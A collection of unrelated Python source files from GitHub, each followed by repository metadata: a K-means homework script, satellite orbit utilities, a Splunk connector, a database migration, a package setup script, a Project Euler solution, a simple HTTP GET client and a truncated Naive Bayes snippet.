#分群 K-means
model = KMeans(n_clusters = 16)
data = file.read_csv("./data.csv")
data.drop(['id'],axis=1)
predict = model.fit(data).labels_
ans = []
for row in predict:
ans.append(row)
test = file.read_csv("./test.csv")
test0 = test['0']
test1 = test['1']
#Output Ans
with open('output.csv', 'w') as f:
f.write("index,ans\n")
for i in range(len(test)):
if(ans[test0.iloc[i]] != ans[test1.iloc[i]]):
f.write(str(i) + "," + str(0) + "\n")
else:
f.write(str(i) + "," + str(1) + "\n")
| kiper00/DataMining | Hw2/Hw.py | Hw.py | py | 694 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sklearn.cluster.KMeans",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 17,
"usage_type": "call"
}
] |
777182916 | import datetime
import numpy as np
import torch
def get_gravity_constants(gravity_constant_name):
if gravity_constant_name == 'wgs-72old':
mu = 398600.79964 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 0.0743669161
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name == 'wgs-72':
mu = 398600.8 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name=="wgs-84":
mu = 398600.5 # in km3 / s2
radiusearthkm = 6378.137 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.00108262998905
j3 = -0.00000253215306
j4 = -0.00000161098761
j3oj2 = j3 / j2
else:
raise RuntimeError("Supported gravity constant names: wgs-72, wgs-84, wgs-72old while "+gravity_constant_name+" was provided")
return torch.tensor(tumin), torch.tensor(mu), torch.tensor(radiusearthkm), torch.tensor(xke), torch.tensor(j2), torch.tensor(j3), torch.tensor(j4), torch.tensor(j3oj2)
def propagate(x, tle_sat, tsince, gravity_constant_name="wgs-84"):
"""
This function takes a tensor of inputs and a TLE, and returns the corresponding state.
It can be used to take the gradient of the state w.r.t. the inputs.
Args:
- x (``torch.tensor``): input of tensors, with the following values (x[0:9] have the same units as the ones in the TLE):
- x[0]: bstar
- x[1]: ndot
- x[2]: nddot
- x[3]: ecco
- x[4]: argpo
- x[5]: inclo
- x[6]: mo
- x[7]: kozai
- x[8]: nodeo
- tle_sat (``dsgp4.tle.TLE``): TLE object to be propagated
- tsince (``float``): propagation time in minutes
Returns:
- state (``torch.tensor``): (2x3) tensor representing position and velocity in km and km/s.
"""
from .sgp4init import sgp4init
from .sgp4 import sgp4
whichconst=get_gravity_constants(gravity_constant_name)
sgp4init(whichconst=whichconst,
opsmode='i',
satn=tle_sat.satellite_catalog_number,
epoch=(tle_sat._jdsatepoch+tle_sat._jdsatepochF)-2433281.5,
xbstar=x[0],
xndot=x[1],
xnddot=x[2],
xecco=x[3],
xargpo=x[4],
xinclo=x[5],
xmo=x[6],
xno_kozai=x[7],
xnodeo=x[8],
satellite=tle_sat)
state=sgp4(tle_sat, tsince*torch.ones(1,1))
return state
def from_year_day_to_date(y,d):
return (datetime.datetime(y, 1, 1) + datetime.timedelta(d - 1))
def gstime(jdut1):
deg2rad=np.pi/180.
tut1 = (jdut1 - 2451545.0) / 36525.0
temp = -6.2e-6* tut1 * tut1 * tut1 + 0.093104 * tut1 * tut1 + \
(876600.0*3600 + 8640184.812866) * tut1 + 67310.54841 # sec
temp = (temp*(np.pi/180.0) / 240.0) % (2*np.pi) # 360/86400 = 1/240, to deg, to rad
# ------------------------ check quadrants ---------------------
temp=torch.where(temp<0., temp+(2*np.pi), temp)
return temp
def clone_w_grad(y):
return y.clone().detach().requires_grad_(True)
def jday(year, mon, day, hr, minute, sec):
"""
Converts a date and time to a Julian Date. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
year (`int`): year
mon (`int`): month
day (`int`): day
hr (`int`): hour
minute (`int`): minute
sec (`float`): second
Returns:
`float`: Julian Date
"""
jd=(367.0 * year -
7.0 * (year + ((mon + 9.0) // 12.0)) * 0.25 // 1.0 +
275.0 * mon // 9.0 +
day + 1721013.5)
fr=(sec + minute * 60.0 + hr * 3600.0) / 86400.0
return jd,fr
def invjday(jd):
"""
Converts a Julian Date to a date and time. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
jd (`float`): Julian Date
Returns:
`tuple`: (year, month, day, hour, minute, second)
"""
temp = jd - 2415019.5
tu = temp / 365.25
year = 1900 + int(tu // 1.0)
leapyrs = int(((year - 1901) * 0.25) // 1.0)
days = temp - ((year - 1900) * 365.0 + leapyrs) + 0.00000000001
if (days < 1.0):
year = year - 1
leapyrs = int(((year - 1901) * 0.25) // 1.0)
days = temp - ((year - 1900) * 365.0 + leapyrs)
mon, day, hr, minute, sec = days2mdhms(year, days)
sec = sec - 0.00000086400
return year, mon, day, hr, minute, sec
def days2mdhms(year, fractional_day):
"""
Converts a number of days to months, days, hours, minutes, and seconds.
Args:
year (`int`): year
fractional_day (`float`): number of days
Returns:
`tuple`: (month, day, hour, minute, second)
"""
d=datetime.timedelta(days=fractional_day)
datetime_obj=datetime.datetime(year-1,12,31)+d
return datetime_obj.month, datetime_obj.day, datetime_obj.hour, datetime_obj.minute, datetime_obj.second+datetime_obj.microsecond/1e6
def from_string_to_datetime(string):
"""
Converts a string to a datetime object.
Args:
string (`str`): string to convert
Returns:
`datetime.datetime`: datetime object
"""
if string.find('.')!=-1:
return datetime.datetime.strptime(string, '%Y-%m-%d %H:%M:%S.%f')
else:
return datetime.datetime.strptime(string, '%Y-%m-%d %H:%M:%S')
def from_mjd_to_epoch_days_after_1_jan(mjd_date):
"""
Converts a Modified Julian Date to the number of days after 1 Jan 2000.
Args:
mjd_date (`float`): Modified Julian Date
Returns:
`float`: number of days after 1 Jan 2000
"""
d = from_mjd_to_datetime(mjd_date)
dd = d - datetime.datetime(d.year-1, 12, 31)
days = dd.days
days_fraction = (dd.seconds + dd.microseconds/1e6) / (60*60*24)
return days + days_fraction
def from_mjd_to_datetime(mjd_date):
"""
Converts a Modified Julian Date to a datetime object. The Modified Julian Date is the number of days since midnight on November 17, 1858.
Args:
mjd_date (`float`): Modified Julian Date
Returns:
`datetime.datetime`: datetime object
"""
jd_date=mjd_date+2400000.5
return from_jd_to_datetime(jd_date)
def from_jd_to_datetime(jd_date):
"""
Converts a Julian Date to a datetime object. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
jd_date (`float`): Julian Date
Returns:
`datetime.datetime`: datetime object
"""
year, month, day, hour, minute, seconds=invjday(jd_date)
e_1=datetime.datetime(year=int(year), month=int(month), day=int(day), hour=int(hour), minute=int(minute), second=0)
return e_1+datetime.timedelta(seconds=seconds)
def get_non_empty_lines(lines):
"""
This function returns the non-empty lines of a list of lines.
Args:
lines (`list`): list of lines
Returns:
`list`: non-empty lines
"""
if not isinstance(lines, str):
raise ValueError('Expecting a string')
lines = lines.splitlines()
lines = [line for line in lines if line.strip()]
return lines
def from_datetime_to_fractional_day(datetime_object):
"""
Converts a datetime object to a fractional day. The fractional day is the number of days since the beginning of the year. For example, January 1st is 0.0, January 2nd is 1.0, etc.
Args:
datetime_object (`datetime.datetime`): datetime object to convert
Returns:
`float`: fractional day
"""
d = datetime_object-datetime.datetime(datetime_object.year-1, 12, 31)
fractional_day = d.days + d.seconds/60./60./24 + d.microseconds/60./60./24./1e6
return fractional_day
def from_datetime_to_mjd(datetime_obj):
"""
Converts a datetime object to a Modified Julian Date. The Modified Julian Date is the number of days since midnight on November 17, 1858.
Args:
datetime_obj (`datetime.datetime`): datetime object to convert
Returns:
`float`: Modified Julian Date
"""
return from_datetime_to_jd(datetime_obj)-2400000.5
def from_datetime_to_jd(datetime_obj):
"""
Converts a datetime object to a Julian Date. The Julian Date is the number of days since noon on January 1, 4713 BC.
Args:
datetime_obj (`datetime.datetime`): datetime object to convert
Returns:
`float`: Julian Date
"""
return sum(jday(year=datetime_obj.year, mon=datetime_obj.month, day=datetime_obj.day, hr=datetime_obj.hour, minute=datetime_obj.minute, sec=datetime_obj.second+float('0.'+str(datetime_obj.microsecond))))
def from_cartesian_to_tle_elements(state, gravity_constant_name='wgs-72'):
"""
This function converts the provided state from Cartesian to TLE elements.
Args:
state (`np.ndarray`): state to convert
gravity_constant_name (`str`): name of the central body (default: 'wgs-72')
Returns:
tuple: tuple containing: - `float`: semi-major axis - `float`: eccentricity - `float`: inclination - `float`: right ascension of the ascending node - `float`: argument of perigee - `float`: mean anomaly
"""
_,mu_earth,_,_,_,_,_,_=get_gravity_constants(gravity_constant_name)
mu_earth=float(mu_earth)*1e9
kepl_el = from_cartesian_to_keplerian(state, mu_earth)
tle_elements={}
tle_elements['mean_motion'] = np.sqrt(mu_earth/((kepl_el[0])**(3.0)))
tle_elements['eccentricity'] = kepl_el[1]
tle_elements['inclination'] = kepl_el[2]
tle_elements['raan'] = kepl_el[3]
tle_elements['argument_of_perigee'] = kepl_el[4]
mean_anomaly = kepl_el[5] - kepl_el[1]*np.sin(kepl_el[5])
tle_elements['mean_anomaly'] = mean_anomaly%(2*np.pi)
return tle_elements
def from_cartesian_to_keplerian(state, mu):
"""
This function takes the state in cartesian coordinates and the gravitational
parameter of the central body, and returns the state in Keplerian elements.
Args:
state (`np.array`): numpy array of 2 rows and 3 columns, where
the first row represents position, and the second velocity.
mu (`float`): gravitational parameter of the central body
Returns:
`np.array`: numpy array of the six keplerian elements: (a,e,i,omega,Omega,mean_anomaly)
(i.e., semi major axis, eccentricity, inclination,
right ascension of ascending node, argument of perigee,
mean anomaly). All the angles are in radiants, eccentricity is unitless
and semi major axis is in SI.
"""
h_bar = np.cross(np.array([state[0,0], state[0,1], state[0,2]]), np.array([state[1,0], state[1,1], state[1,2]]))
h = np.linalg.norm(h_bar)
r = np.linalg.norm(np.array([state[0,0], state[0,1], state[0,2]]))
v = np.linalg.norm(np.array([state[1,0], state[1,1], state[1,2]]))
E = 0.5*(v**2)-mu/r
a = -mu/(2*E)
e = np.sqrt(1-(h**2)/(a*mu))
i = np.arccos(h_bar[2]/h)
Omega = np.arctan2(h_bar[0],-h_bar[1])
lat = np.arctan2(np.divide(state[0,2],(np.sin(i))), (state[0,0]*np.cos(Omega) + state[0,1]*np.sin(Omega)))
p = a*(1-e**2)
nu = np.arctan2(np.sqrt(p/mu)*np.dot(np.array([state[0,0], state[0,1], state[0,2]]),np.array([state[1,0], state[1,1], state[1,2]])), p-r)
omega = (lat-nu)
eccentric_anomaly = 2*np.arctan(np.sqrt((1-e)/(1+e))*np.tan(nu/2))
n = np.sqrt(mu/(a**3))
mean_anomaly=eccentric_anomaly-e*np.sin(eccentric_anomaly)
#I make sure they are always in 0,2pi
if mean_anomaly<0:
mean_anomaly = 2*np.pi-abs(mean_anomaly)
if omega<0:
omega=2*np.pi-abs(omega)
if Omega<0:
Omega=2*np.pi-abs(Omega)
if abs(mean_anomaly)>2*np.pi:
mean_anomaly=mean_anomaly%(2*np.pi)
if abs(omega)>2*np.pi:
omega=omega%(2*np.pi)
if abs(Omega)>2*np.pi:
Omega=Omega%(2*np.pi)
return np.array([a, e, i, Omega, omega, mean_anomaly])
def from_cartesian_to_keplerian_torch(state, mu):
"""
Same as from_cartesian_to_keplerian, but for torch tensors.
Args:
state (`np.array`): numpy array of 2 rows and 3 columns, where
the first row represents position, and the second velocity.
mu (`float`): gravitational parameter of the central body
Returns:
`np.array`: numpy array of the six keplerian elements: (a,e,i,omega,Omega,mean_anomaly)
(i.e., semi major axis, eccentricity, inclination,
right ascension of ascending node, argument of perigee,
mean anomaly). All the angles are in radiants, eccentricity is unitless
and semi major axis is in SI.
"""
h_bar = torch.cross(state[0], state[1])
h = h_bar.norm()
r = state[0].norm()
v = torch.norm(state[1])
E = 0.5*(v**2)-mu/r
a = -mu/(2*E)
e = torch.sqrt(1-(h**2)/(a*mu))
i = torch.arccos(h_bar[2]/h)
Omega = torch.arctan2(h_bar[0],-h_bar[1])
lat = torch.arctan2(torch.divide(state[0,2],(torch.sin(i))), (state[0,0]*torch.cos(Omega) + state[0,1]*torch.sin(Omega)))
p = a*(1-e**2)
nu = torch.arctan2(torch.sqrt(p/mu)*torch.dot(state[0],state[1]), p-r)
omega = (lat-nu)
eccentric_anomaly = 2*torch.arctan(torch.sqrt((1-e)/(1+e))*torch.tan(nu/2))
n = torch.sqrt(mu/(a**3))
mean_anomaly=eccentric_anomaly-e*torch.sin(eccentric_anomaly)
#I make sure they are always in 0,2pi
mean_motion=torch.sqrt(mu/((a)**(3.0)))
xpdotp = 1440.0 / (2.0 *np.pi)
no_kozai_conversion_factor=xpdotp/43200.0* np.pi
no_kozai=mean_motion/no_kozai_conversion_factor
return [no_kozai, e, i, Omega, omega, mean_anomaly]
| esa/dSGP4 | dsgp4/util.py | util.py | py | 14,817 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "numpy.sqrt",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "sgp4init.sgp4init",
"line_numb... |
8257193173 | import logging
from typing import Mapping
from datetime import datetime
import attr
from .dixel import Dixel
from ..utils import Pattern, DatetimeInterval, gateway
from ..utils.dicom import DicomLevel
# splunk-sdk is 2.7 only, so diana.utils.gateway provides a minimal query/put replacement
# Suppress insecure warning
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@attr.s
class Splunk(Pattern):
host = attr.ib( default="localhost" )
port = attr.ib( default="8000" )
user = attr.ib( default="splunk" )
protocol = attr.ib( default="http" )
password = attr.ib( default="admin" )
hec_protocol = attr.ib( default="http" )
hec_port = attr.ib( default="8088" )
gateway = attr.ib( init=False )
hec_tokens = attr.ib( factory=dict ) # Mapping of domain name -> token
default_token = attr.ib( default=None )
default_index = attr.ib( default='main' )
@gateway.default
def connect(self):
# Create a Service instance and log in
return gateway.Splunk(
host=self.host,
port=self.port,
protocol = self.protocol,
hec_port=self.hec_port,
hec_protocol=self.hec_protocol,
user=self.user,
password=self.password
)
def add_hec_token(self, name: str, token: str):
self.hec_tokens[name] = token
def find_items(self,
query: Mapping,
time_interval: DatetimeInterval=None):
results = self.gateway.find_events(query, time_interval)
# logging.debug("Splunk query: {}".format(query))
# logging.debug("Splunk results: {}".format(results))
if results:
worklist = set()
for d in results:
worklist.add( Dixel(meta=d, level=DicomLevel.of( d['level'] ) ) )
# logging.debug(worklist)
return worklist
def put(self, item: Dixel, host: str, token: str, index: str=None ):
logging.debug("Putting in Splunk")
if item.meta.get('InstanceCreationDateTime'):
timestamp = item.meta.get('InstanceCreationDateTime')
elif item.meta.get('StudyDateTime'):
timestamp = item.meta.get('StudyDateTime')
else:
logging.warning("Failed to get inline 'DateTime', using now()")
timestamp = datetime.now()
event = item.meta
event['level'] = str(item.level)
event['oid'] = item.oid()
if not token:
token=self.default_token
_token = self.hec_tokens.get(token)
if not index:
index=self.default_index
self.logger.debug(timestamp)
self.logger.debug(event)
self.logger.debug(index)
self.logger.debug(_token)
_host = "{}@{}".format(host, self.hostname)
# at $time $event was reported by $host for $index with credentials $auth
self.gateway.put_event( timestamp=timestamp, event=event, host=_host, index=index, token=_token )
# Real auth description
# headers = {'Authorization': 'Splunk {0}'.format(self.hec_tok[hec])}
| derekmerck/DIANA | packages/diana/diana/apis/splunk.py | splunk.py | py | 3,138 | python | en | code | 11 | github-code | 6 | [
{
"api_name": "urllib3.disable_warnings",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "urllib3.exceptions",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "utils.Pattern",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "attr.i... |
27055792799 | """empty message
Revision ID: 22771e69d10c
Revises: 8c7cbf0f76c6
Create Date: 2021-07-14 18:46:48.994109
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "22771e69d10c"
down_revision = "8c7cbf0f76c6"
branch_labels = None
depends_on = None
def upgrade():
op.drop_constraint("participant_github_key", "participant", type_="unique")
op.alter_column(
"user", "username", existing_nullable=False, new_column_name="github_username"
)
op.add_column("user", sa.Column("first_name", sa.String(length=50), nullable=True))
op.add_column("user", sa.Column("last_name", sa.String(length=50), nullable=True))
op.add_column("user", sa.Column("email", sa.String(length=200), nullable=True))
op.add_column("user", sa.Column("phone", sa.String(length=13), nullable=True))
op.add_column("user", sa.Column("slack", sa.String(length=21), nullable=True))
op.add_column("user", sa.Column("is_admin", sa.Boolean(), nullable=True))
op.create_unique_constraint(None, "user", ["github_username"])
op.alter_column(
"participant",
"github",
nullable=False,
new_column_name="github_username",
server_default=None,
)
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, "user", type_="unique")
op.create_unique_constraint("user_username_key", "user", ["username"])
op.drop_column("user", "is_admin")
op.drop_column("user", "slack")
op.drop_column("user", "phone")
op.drop_column("user", "email")
op.drop_column("user", "last_name")
op.drop_column("user", "first_name")
op.drop_constraint(None, "participant", type_="unique")
op.alter_column(
"user", "github_username", nullable=False, new_column_name="username"
)
op.alter_column(
"participant",
"github_username",
existing_nullable=False,
new_column_name="github",
)
# ### end Alembic commands ###
| CodeForPoznan/codeforpoznan.pl_v3 | backend/migrations/versions/22771e69d10c_.py | 22771e69d10c_.py | py | 2,028 | python | en | code | 8 | github-code | 6 | [
{
"api_name": "alembic.op.drop_constraint",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "alembic.op.alter_column",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "alembic... |
26126736743 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
# Imports
import io
from setuptools import setup, find_packages
# Readme file
with io.open('README.rst', encoding='utf-8') as readme_file:
readme = readme_file.read()
# ChangeLog file
with io.open('HISTORY.rst', encoding='utf-8') as history_file:
history = history_file.read()
# Requirements Variable
requirements: list = [
# Package Requirements
'sentry_sdk',
'pytest',
]
# Setup Requirements Variable
setup_requirements: list = [
# Setup Requirements
]
# Test Requirements Variable
test_requirements: list = [
# Test Requirements
'pylint',
'pytest',
'coverage'
]
setup(
# Name of Package
name='pwbs',
# Version following SemVer Style
version='0.5.0-dev2',
# Description of the Package
description='PWBS is Build System for easy automation process.',
# Description of the Package to show on PyPi (Longer Description)
long_description=readme + '\n\n' + history,
# The Project Mainpage [For that project for now is just repository]
url='https://gitlab.com/paip-web/pwbs',
# Author Details
author='Patryk Adamczyk',
author_email='patrykadamczyk@paipweb.com',
# License
license='MIT',
# Classifiers of the Project
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 'Development Status :: 1 - Planning'
# 'Development Status :: 2 - Pre-Alpha'
# 'Development Status :: 3 - Alpha'
# 'Development Status :: 4 - Beta'
# 'Development Status :: 5 - Production/Stable'
# 'Development Status :: 6 - Mature'
# 'Development Status :: 7 - Inactive'
'Development Status :: 2 - Pre-Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
# Topic
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Utilities',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Operating System :: OS Independent',
'Operating System :: Microsoft :: Windows',
'Operating System :: Microsoft :: Windows :: Windows 7',
'Operating System :: Microsoft :: Windows :: Windows 10',
'Operating System :: POSIX :: Linux',
'Environment :: Console'
],
# Keywords of your Project
keywords='development build tools task runner',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# packages=["pwbs"],
# packages=find_packages(exclude=['docs', 'tests*']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# Dependencies of the Project
install_requires=requirements,
tests_require=test_requirements,
setup_requires=setup_requirements,
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'setup': ["wheel", "twine", "collective.checkdocs"],
'test': ['pylint', 'pytest', 'coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'pwbs=pwbs:main',
],
},
# Python Required Version for the package
python_requires='~=3.6',
)
| paip-web/pwbs | setup.py | setup.py | py | 4,954 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "io.open",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line... |
42519865803 | # The radical of n, rad(n), is the product of distinct prime factors of n. For
# example, 504 = 2^3 x 3^2 x 7, so rad(504) = 2 x 3 x 7 = 42.
#
# We shall define the triplet of positive integers (a, b, c) to be an abc-hit if:
# GCD(a, b) = GCD(a, c) = GCD(b, c) = 1
# a < b
# a + b = c
# rad(abc) < c
# For example, (5, 27, 32) is an abc-hit, because:
# GCD(5, 27) = GCD(5, 32) = GCD(27, 32) = 1
# 5 < 27
# 5 + 27 = 32
# rad(4320) = 30 < 32
# It turns out that abc-hits are quite rare and there are only thirty-one abc
# hits for c < 1000, with sum(c) = 12523.
#
# Find sum(c) for c < 120000.
from fractions import gcd
from euler.utils import Utils
u = Utils()
def hit(a, b, c, rad):
cond_1 = gcd(b, c) == 1
cond_2 = rad[a] * rad[b] * rad[c] < c
return cond_1 and cond_2
def rad(n, primes):
"""
creates an array of rad(n) for all values < n using dp
and a precalculated set of primes.
"""
l = [0, 1]
i = 2
while i < n:
n_ = i
if n_ in primes:
l.append(n_)
else:
for p in primes:
if n_ % p != 0:
continue
while n_ % p == 0:
n_ /= p
if n_ < len(l):
l.append(p * l[int(n_)])
break
i += 1
return l
def p127(max_c, exp):
primes = u.sieve(max_c)
radicals = rad(int(max_c), primes)
possible_ys = [i for i in range(1, max_c) if radicals[i] <= int(max_c ** exp)]
possible_rads = [radicals[i] for i in possible_ys]
print("len(radicals):", len(radicals))
print("len(possible_ys):", len(possible_ys))
print(possible_ys)
print(possible_rads)
total = 0
for a in possible_ys:
for b in possible_ys:
c = a + b
if a < b and c < max_c and hit(a, b, c, radicals):
print(a,b,c)
total += c
return total
print(p127(120000, 0.8)) | jose-ramirez/project_euler | problems/p127.py | p127.py | py | 2,025 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "euler.utils.Utils",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "fractions.gcd",
"line_number": 26,
"usage_type": "call"
}
] |
9414662626 | import socket ##required
import argparse ##gets argument from command line
import sys ##system calls
import re ## parsing string
BUFF_SIZE = 4096
TIMEOUT_SIZE = 2
neededInfo = { #contains everything that i need in my log
'url':None,
'sName':None,
'sIp':None,
'sPort':None,
'Path':None,
'cIp':None,
'cPort':None,
'msg':None,
'html_msg':None
}
parser = argparse.ArgumentParser(description='Getting the HTTP request input')
parser.add_argument('input', type=str, help='User input', nargs='+')
cmd_input = parser.parse_args().input
url = cmd_input[0]
http_exists = True
parsed = re.search(r"(?P<http>https*)://?(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)
if(parsed == None):
http_exists = False
parsed = re.search(r"(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)
#regex checking if they exist thru regex
check_host = re.findall("[a-z]+\.\w+\.[a-z]+", url)
check_domain = re.findall("([a-zA-Z0-9]+\.[a-z]+)", url)
check_ip = re.findall("([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})", url)
if (len(check_host) == 0 and len(check_domain) == 0 and len(check_ip) == 0):
sys.exit("Couldn't find host " + url)
if(parsed == None):
sys.exit("Parsed argument errored.")
if(http_exists == True):
rawr = parsed.group('http')
https_true = False ##cannot support https check if it is and if so print error
if( rawr == "https"):
https_true = True
if (https_true == True ):
sys.exit("HTTPS is not supported.")
##Port settings
rawr = parsed.group('port')
port_true = False
port_empty = False
if( rawr == None):
port_empty = True
if( rawr == "443" ):
port_true = True
if(port_empty == True):
neededInfo['sPort'] = int(parsed.group('port'))
else:
neededInfo['sPort'] = 80
# set sName and sIp
multi_input = False
rawr = parsed.group('site')
if(len(cmd_input) ==2):
multi_input = True
if(multi_input == False):
neededInfo['sName'] = rawr
neededInfo['sIp'] = socket.gethostbyname(neededInfo['sName'])
if(multi_input == True):
if (re.match("[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}", rawr)):
neededInfo['sName'] = cmd_input[1]
neededInfo['sIp'] = rawr
else:
neededInfo['sName'] = rawr
neededInfo['sIp'] = cmd_input[1]
# setting path
rawr = parsed.group('path')
path_empty = False
if(rawr == None):
path_empty = True
if(path_empty == True):
neededInfo['Path'] = "/"
else:
neededInfo['Path'] = rawr
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#start connection between source and and host
sock.connect((neededInfo['sIp'], neededInfo['sPort']))
sock.settimeout(TIMEOUT_SIZE)
neededInfo['cIp'], neededInfo['cPort'] = sock.getsockname() #gets cip and cport
request = "GET {} HTTP/1.1\r\nHost:{}\r\n\r\n".format(neededInfo['Path'], neededInfo['sName'])
sock.send(request.encode()) #changing request (type string) need to encode to a byte
#if the port is bad, we print to our Log file with the respective parameters
if(port_true == True):
log = "Unsuccessful, 56, {}, {}, {}, {}, {}, {}, [Errno 54] Connection reset by peer\n\n".format(url,
neededInfo['sName'], str(neededInfo['cIp']), str(neededInfo['sIp']), str(neededInfo['cPort']),
str(neededInfo['sPort']))
f = open("Log.csv", "a")
f.write(log)
f.close()
sys.exit("Port not supported")
#get the header
neededInfo['msg'] = ""
try:
while True:
pack = sock.recv(1) #getting one byte
if("\r\n\r" in neededInfo['msg'] or pack == None): #see \r\n\r signals the end of the header file
break
neededInfo['msg'] = neededInfo['msg'] + pack.decode()
except:
sock.close()
sys.exit("Could not receieved information from message.")
msg_true = re.search(r"Content-Length: (\d+)",neededInfo['msg']) #get content length
msg_exists = False
if(msg_true != None):
msg_true = int(msg_true.group(1))-len(neededInfo['msg'].encode())
msg_exists = True
#get the rest of the message in html format if it exists
neededInfo['html_msg'] = ""
if(msg_exists == True):
try:
while True:
pack = sock.recv(BUFF_SIZE)
len_size = False
if (len(pack) == BUFF_SIZE):
len_size = True
if (len_size == False):
neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
break
neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
except Exception as e:
sock.close()
sys.exit("Could not receieved information from message.")
# http_out = http_out + pack.decode()
# neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
sock.close()
#set stattus based on above
http_status = re.search(r"(HTTP/.*)?", neededInfo['msg']).group(1)
#print the html content into my httpoutput.html file
f = open("HTTPoutput.html", "w")
f.write(neededInfo['html_msg'])
f.close()
#print to my log file with respective parameters
log = ""
print_message = ""
status_code = re.search(r"HTTP/\d{1}.?\d? (\d*)? \w+", http_status).group(1)
success = True
if(status_code != '200'):
success = False
if(success == True):
run_status = "Successful"
if(success == False):
run_status = "Unsuccessful"
term_out = run_status + " " + url + " " + http_status
print(term_out)
if "chunked" in neededInfo['msg']:
print("ERROR: Chunk encoding is not supported")
log = log +run_status + " "
log = log+ status_code + " "
log = log+ url + " "
log = log+ neededInfo['sName'] + " "
log = log+ str(neededInfo['cIp']) + " "
log = log+ str(neededInfo['sIp']) + " "
log = log+ str(neededInfo['cPort']) + " "
log = log+ str(neededInfo['sPort']) + " "
log = log+ http_status
log = log + "\n\n"
f = open("Log.csv", "a")
f.write(log)
f.close()
| kelly8282/python-stuff | kliu80MyCurl_2_1.py | kliu80MyCurl_2_1.py | py | 6,029 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_nu... |
42514144175 | import math
import nltk
nltk.download('stopwords')
import pandas as pd
import re
from copy import deepcopy
from dictionary.models import Dialect
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from django.shortcuts import render, redirect
class NaiveBayes:
def split_reg(self, *args):
sentence = self.lower()
new = ' '.join([word for word in re.split(r'[^A-Za-z]', sentence) if word])
return new
def split_word(new):
stop_words_lst = set(stopwords.words("english"))
stop_words_lst.update (('ako','ang','amua','ato','busa','ikaw','ila','ilang','imo','imong','iya','iyang','kaayo','kana',
'kaniya','kaugalingon','kay','kini','kinsa','kita','lamang','mahimong','mga','mismo','nahimo'
